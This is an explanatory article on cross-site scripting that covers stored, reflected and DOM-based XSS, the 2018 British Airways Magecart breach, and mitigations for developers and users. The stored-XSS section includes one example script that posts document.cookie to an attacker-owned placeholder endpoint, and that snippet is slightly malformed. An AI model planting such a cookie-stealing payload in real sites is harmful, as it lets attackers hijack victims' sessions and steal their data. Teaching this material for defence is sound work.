Cross Site Scripting attacks (XSS)

Introduction

XSS stands for Cross-Site Scripting, a type of injection in which to malicious code is injected into otherwise trusted web pages, often on the client side. XSS attacks can compromise the confidentiality, integrity and availability of web applications and their users. In this article, we will explain the basic concepts of XSS, the different types of XSS attacks, and how to prevent them.

How it works

Most XSS attacks follow this pattern:

1. An untrusted source uploads a malicious script to the site, typically through a request.
2. If proper validation or sanitization is not performed, this script is accepted by the server.
3. Consequently, the response provided by the server is modified, which is then executed by the client.

Types of XSS

XSS attacks can be broadly categorized into 3 types based on persistence. We will explain each type with a small example:

1. Stored XSS attack: In this type of attack, a malicious script is permanently stored on the server, often in the form of text or an image in the database. When other users access the resources, they unknowingly execute the malicious script. This is sometimes referred to as Persistent or Type-II XSS attack.

Ex: Consider a simple blog site. A user can write the following script as a part of the blog, which can be executed if proper validation or sanitization has not been implemented.

<script>eval(fetch("url", { method: "POST", headers: { "Content-Type": "application/json" }, body: document.cookie }))</script>

This script will send the cookies of the victim to the url endpoint owned by the attack perpetrator.

1. Reflected XSS attack: In this type of attack, the malicious script is "reflected" from the server directly after an HTTP request is sent, often as an error message or browser alert. It is referred to as a Non-Persistent or Type-I XSS attack.

Ex: Consider the same blog site. A user may send other users a link to their "blog" in the format:

www.safe-website.com/blogs/<script>*malicious code*</script>

When the victim opens this link, the server responds with an error stating: <script>*malicious code*</script>. If this is not properly escaped, the malicious code will execute on the client.

1. DOM based XSS attack: It is a more complicated form of XSS attack. While the other forms of attack focus on injecting malicious code into the server's response. This form of attack aims at modifying the client-side code itself (the DOM of the website). It occurs when an application's client-side retrieves data from various sources and updates the DOM using that data.

Ex: In the same blog site, imagine a feature that displays top news headlines. If the owner of the news API injects a malicious script into the data and the client-side does not properly sanitize it, the script can run. For instance, the DOM:

<ul>
  <li>News</li>
  ...
<ul>

Could be modified to this

<ul>
  <li>News<script>*malicious code*</script></li>
  ...
</ul>

XSS attacks can also be categorized as Client XSS attacks or Server XSS attacks based on where the malicious script gets injected into the data.

A DOM-based XSS attack falls under the category of Client XSS attack.

Dangers

A notable capability of an XSS attack is its ability to bypass the browser's same-origin policy, enabling the perpetrator to execute actions like cookie theft and unauthorized access to information associated with the targeted site.

What amplifies its danger is that victims often remain oblivious to the occurrence of such an attack.

An XSS attack can lead to various issues for the end-user, including the theft of session cookies, session hijacking, the download of malware such as trojans, and more. In certain instances, if an attack successfully targets a critical authority, such as a server administrator, it can escalate into a large-scale data breach, potentially exposing millions of account credentials.

Notable past event:

In 2018, British Airways was attacked by Magecart, a high-profile hacker group famous for credit card skimming attacks. The group exploited an XSS vulnerability in a JavaScript library called Feedify, which was used on the British Airway website. Attackers modified the script to send customer data to a malicious server, which used a domain name similar to British Airways. They succeeded in performing credit card skimming on 380,000 booking transactions before the breach was discovered. Source

Mitigation

What developers can do:

It is imperative for developers to take necessary precautions to mitigate the risk of XSS attacks, as these vulnerabilities can compromise their customers' data, trust, and overall integrity. Implementing the following measures can help ensure that their applications remain secure and reliable:

• Utilize encoding: Employ recommended encoding techniques for HTML to encode tags, such as <, which is encoded to <.
• Sanitize input data: Ensure thorough validation of input data not only to prevent XSS but also to guard against other injection-based attacks.
• Escape output data: When displaying data to the end-user, ensure that any malicious code is properly escaped to prevent its execution. Make use of escaped output when using templates.
• Define client-side execution permissions: Implement Content Security Policies (CSPs) to define what can and cannot be executed on the client. Restrict the execution of inline scripts using the script-src property. This measure helps thwart Client XSS attacks.
• Adjust cookie attributes: Modify cookie attributes to regulate how browsers and JavaScript can access cookies.
• Establish firewalls: Set up firewalls to prevent data from being transmitted to unauthorized domains.
• Conduct vulnerability assessments: Utilize tools like Burp to identify any potential XSS vulnerabilities that may have gone undetected during other security checks.

What end-users can do:

XSS attacks exploit site vulnerabilities to target end-users, leaving them with limited control over their security.
Nevertheless, they can take these measures to improve their security:

• Disable JavaScript: Since JavaScript is commonly exploited in XSS attacks, it is advisable to disable it, enabling it only for whitelisted sites or sites that are non-functional without it.
• Don't open unsafe links: Exercise caution while opening any link, even if the link is part of the same domain. Always inspect the URI before opening it to avoid falling victim to XSS attacks.
• Secure credentials: Ensure the use of unique passwords for each website. Even if credentials for a particular site are compromised through an XSS attack, accounts on other sites will remain secure.
• Utilize multi-factor authentication (MFA): MFA provides an additional layer of security. Even if credentials for a site are compromised, the data associated with that site will remain under the user's control.

Conclusion

In conclusion, understanding the intricacies and potential dangers of XSS attacks is crucial for both developers and end-users. By implementing stringent security measures such as encoding, input data sanitization, and output data escaping, developers can fortify their applications against potential vulnerabilities. By fostering a collaborative approach to web security, we can collectively work towards mitigating the risks posed by XSS attacks and ensuring a safer online experience for all users.